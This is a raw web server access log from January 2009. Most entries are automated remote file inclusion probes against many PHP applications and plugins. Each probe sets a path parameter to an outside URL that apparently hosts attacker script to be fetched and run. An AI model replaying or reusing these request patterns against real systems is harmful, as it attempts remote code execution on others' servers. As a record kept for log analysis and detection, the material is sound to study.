87.106.16.155 - - [30/Jan/2009:11:32:19 -0800] "GET /logs/access_080130.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.6.145.139 - - [30/Jan/2009:11:32:29 -0800] "GET /logs/access_080907.log/layout/cmp_footer.inc.php?rootpath=http://digilander.libero.it/mrkz/forzaid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.6.145.139 - - [30/Jan/2009:11:32:30 -0800] "GET /layout/cmp_footer.inc.php?rootpath=http://digilander.libero.it/mrkz/forzaid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
190.144.44.36 - - [30/Jan/2009:11:32:37 -0800] "GET /logs/access_081010.log////s_loadenv.inc.php?DOCUMENT_ROOT=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.105.189.50 - - [30/Jan/2009:11:32:49 -0800] "GET /logs/access_080410.log//modules/agendax/addevent.inc.php?agendax_path=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:11:33:00 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:11:33:00 -0800] "GET /logs/access_081104.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:11:33:01 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
193.6.145.139 - - [30/Jan/2009:11:33:04 -0800] "GET /logs/access_080907.log/layout/cmp_footer.inc.php?rootpath=http://digilander.libero.it/mrkz/forzaid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.6.145.139 - - [30/Jan/2009:11:33:04 -0800] "GET /layout/cmp_footer.inc.php?rootpath=http://digilander.libero.it/mrkz/forzaid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.6.145.139 - - [30/Jan/2009:11:33:05 -0800] "GET /logs/layout/cmp_footer.inc.php?rootpath=http://digilander.libero.it/mrkz/forzaid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.184.2.2 - - [30/Jan/2009:11:33:20 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
91.184.2.2 - - [30/Jan/2009:11:33:20 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:11:33:45 -0800] "GET /logs/access_081104.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:11:33:45 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:11:33:46 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
194.30.160.11 - - [30/Jan/2009:11:34:19 -0800] "GET /logs/access_080318.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [30/Jan/2009:11:34:19 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [30/Jan/2009:11:34:19 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:11:34:29 -0800] "GET /logs/access_081110.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
194.30.160.11 - - [30/Jan/2009:11:34:35 -0800] "GET /logs/access_080725.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:11:34:54 -0800] "GET /logs/access_081110.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
77.221.130.15 - - [30/Jan/2009:11:35:20 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://cccgj.org/media/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
77.221.130.15 - - [30/Jan/2009:11:35:20 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://cccgj.org/media/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
77.221.130.15 - - [30/Jan/2009:11:35:20 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://cccgj.org/media/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
77.221.130.15 - - [30/Jan/2009:11:35:21 -0800] "GET /logs/access_080802.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cccgj.org/media/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
77.221.130.15 - - [30/Jan/2009:11:35:21 -0800] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cccgj.org/media/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
77.221.130.15 - - [30/Jan/2009:11:35:21 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cccgj.org/media/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
77.221.130.15 - - [30/Jan/2009:11:35:21 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cccgj.org/media/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
194.30.160.11 - - [30/Jan/2009:11:35:26 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [30/Jan/2009:11:35:26 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.15 - - [30/Jan/2009:11:35:48 -0800] "GET /logs/access_081012.log/errors.php?error=http://cccgj.org/media/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
77.221.130.15 - - [30/Jan/2009:11:35:48 -0800] "GET /errors.php?error=http://cccgj.org/media/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
77.221.130.15 - - [30/Jan/2009:11:35:48 -0800] "GET /logs/errors.php?error=http://cccgj.org/media/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:11:36:40 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:11:36:40 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:11:36:40 -0800] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.21.190 - - [30/Jan/2009:11:36:41 -0800] "GET /logs/access_080127.log//vwar/admin/admin.php?vwar_root=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.21.190 - - [30/Jan/2009:11:36:42 -0800] "GET /vwar/admin/admin.php?vwar_root=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [30/Jan/2009:11:36:42 -0800] "GET /logs/access_081008.log/errors.php?error=http://cccgj.org/media/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
87.106.21.190 - - [30/Jan/2009:11:36:42 -0800] "GET /logs//vwar/admin/admin.php?vwar_root=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.65.25 - - [30/Jan/2009:11:36:47 -0800] "GET /logs/access_080510.log HTTP/1.0" 200 3452284 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:11:36:48 -0800] "GET /logs/access_080819.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.21.190 - - [30/Jan/2009:11:36:51 -0800] "GET /logs/access_080219.log//vwar/admin/admin.php?vwar_root=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.162.219.29 - - [30/Jan/2009:11:36:53 -0800] "GET /logs/access_080913.log/components/errors.php?error=http://www.radioficko.com/chat/chat/uploaddir/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.162.219.29 - - [30/Jan/2009:11:36:53 -0800] "GET /components/errors.php?error=http://www.radioficko.com/chat/chat/uploaddir/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.162.219.29 - - [30/Jan/2009:11:36:53 -0800] "GET /logs/components/errors.php?error=http://www.radioficko.com/chat/chat/uploaddir/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.21.190 - - [30/Jan/2009:11:37:47 -0800] "GET /vwar/admin/admin.php?vwar_root=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [30/Jan/2009:11:37:55 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://cccgj.org/media/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:11:38:18 -0800] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:11:38:18 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:11:38:18 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:11:38:26 -0800] "GET /logs/access_080819.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.65.25 - - [30/Jan/2009:11:40:19 -0800] "GET /logs/access_080605.log HTTP/1.0" 200 2222498 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.221.130.15 - - [30/Jan/2009:11:40:46 -0800] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://cccgj.org/media/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
77.221.130.15 - - [30/Jan/2009:11:40:47 -0800] "GET /logs//?path%5Bdocroot%5D=http://cccgj.org/media/id.txt?? HTTP/1.1" 200 84609 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
77.221.130.15 - - [30/Jan/2009:11:40:53 -0800] "GET /?path%5Bdocroot%5D=http://cccgj.org/media/id.txt?? HTTP/1.1" 200 65555 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:11:41:09 -0800] "GET /Neos_Chronos/header.php?base_folder=http://crosszero.org/zero/iddd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:11:41:09 -0800] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://crosszero.org/zero/iddd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:11:41:09 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://crosszero.org/zero/iddd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [30/Jan/2009:11:41:09 -0800] "GET /logs/access_080717.log//?path%5Bdocroot%5D=http://cccgj.org/media/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:11:41:20 -0800] "GET /avatar.php?page=http://203.114.112.155/webboard1234/1.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:11:41:20 -0800] "GET /logs/access_080828.log%20%20/avatar.php?page=http://203.114.112.155/webboard1234/1.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:11:41:20 -0800] "GET /logs/avatar.php?page=http://203.114.112.155/webboard1234/1.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:11:41:20 -0800] "GET /logs/access_080104.log//Neos_Chronos/header.php?base_folder=http://crosszero.org/zero/iddd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:11:41:26 -0800] "GET /logs/access_080501.log%20%20/avatar.php?page=http://203.114.112.155/webboard1234/1.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.82.66 - - [30/Jan/2009:11:41:29 -0800] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.kimstroy.by//assets/images/_MD.TXT?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
67.15.82.66 - - [30/Jan/2009:11:41:31 -0800] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.kimstroy.by//assets/images/_MD.TXT?? HTTP/1.1" 200 95302 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:41:58 -0800] "GET /logs/access_080529.log/show_news.php?cutepath=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:41:58 -0800] "GET /logs/access_080529.log/show_news.php?cutepath=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:41:58 -0800] "GET /show_news.php?cutepath=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:41:58 -0800] "GET /logs/access_080529.log/show_news.php?cutepath=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:41:58 -0800] "GET /show_news.php?cutepath=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:41:58 -0800] "GET /logs/show_news.php?cutepath=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:41:58 -0800] "GET /show_news.php?cutepath=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:41:58 -0800] "GET /logs/show_news.php?cutepath=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:41:58 -0800] "GET /logs/show_news.php?cutepath=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:11:42:01 -0800] "GET /logs/access_080501.log/avatar.php?page=http://203.114.112.155/webboard1234/1.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:11:42:01 -0800] "GET /logs/access_080828.log/avatar.php?page=http://203.114.112.155/webboard1234/1.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.162.219.29 - - [30/Jan/2009:11:42:20 -0800] "GET /logs/access_080810.log/components/errors.php?error=http://www.radioficko.com/chat/chat/uploaddir/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.65.25 - - [30/Jan/2009:11:46:18 -0800] "GET /logs/access_071009.log HTTP/1.0" 200 26112 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.30.160.11 - - [30/Jan/2009:11:46:52 -0800] "GET /logs/access_080913.log//index.php?content=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [30/Jan/2009:11:46:54 -0800] "GET /index.php?content=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 200 94843 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [30/Jan/2009:11:46:55 -0800] "GET /logs//index.php?content=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.73.228 - - [30/Jan/2009:11:46:56 -0800] "GET /blog/wp-content/gallery/techstoc-2008/img_1024.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
207.162.219.29 - - [30/Jan/2009:11:47:12 -0800] "GET /logs/access_080829.log/components/errors.php?error=http://www.radioficko.com/chat/chat/uploaddir/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:48:08 -0800] "GET /logs/access_080622.log/show_news.php?cutepath=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:48:08 -0800] "GET /logs/access_080622.log/show_news.php?cutepath=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
201.232.54.48 - - [30/Jan/2009:11:48:21 -0800] "GET /logs//guestbook1//admin.php?include_path=http://www.asthmant.org.au/pdf/.dat/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:48:24 -0800] "GET /logs/access_080622.log/show_news.php?cutepath=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
201.232.54.48 - - [30/Jan/2009:11:48:43 -0800] "GET /logs/access_081019.log%20%20//guestbook1//admin.php?include_path=http://www.asthmant.org.au/pdf/.dat/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:11:49:23 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:11:49:24 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
119.245.138.143 - - [30/Jan/2009:11:50:10 -0800] "GET /logs/access_080130.log//errors.php?error=http://www.aerothaiunion.com/sik.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.6.78 - - [30/Jan/2009:11:50:31 -0800] "GET /logs//poll/png.php?include_path=http://www.hotelsunflower.it/includes/js/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
210.205.6.78 - - [30/Jan/2009:11:50:31 -0800] "GET /poll/png.php?include_path=http://www.hotelsunflower.it/includes/js/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
83.172.154.100 - - [30/Jan/2009:11:50:37 -0800] "GET /logs/access_081007.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ragas.baarleweb.net/data/sobi/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.172.154.100 - - [30/Jan/2009:11:50:37 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ragas.baarleweb.net/data/sobi/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.172.154.100 - - [30/Jan/2009:11:50:37 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ragas.baarleweb.net/data/sobi/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:11:51:07 -0800] "GET /logs//components/com_sef/sef_incl.php?mosConfig_absolute_path=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:11:51:07 -0800] "GET /components/com_sef/sef_incl.php?mosConfig_absolute_path=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:11:51:07 -0800] "GET /logs/access_080811.log//components/com_sef/sef_incl.php?mosConfig_absolute_path=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:11:51:13 -0800] "GET /logs/access_080811.log//components/com_sef/sef_incl.php?mosConfig_absolute_path=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:11:51:13 -0800] "GET /components/com_sef/sef_incl.php?mosConfig_absolute_path=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
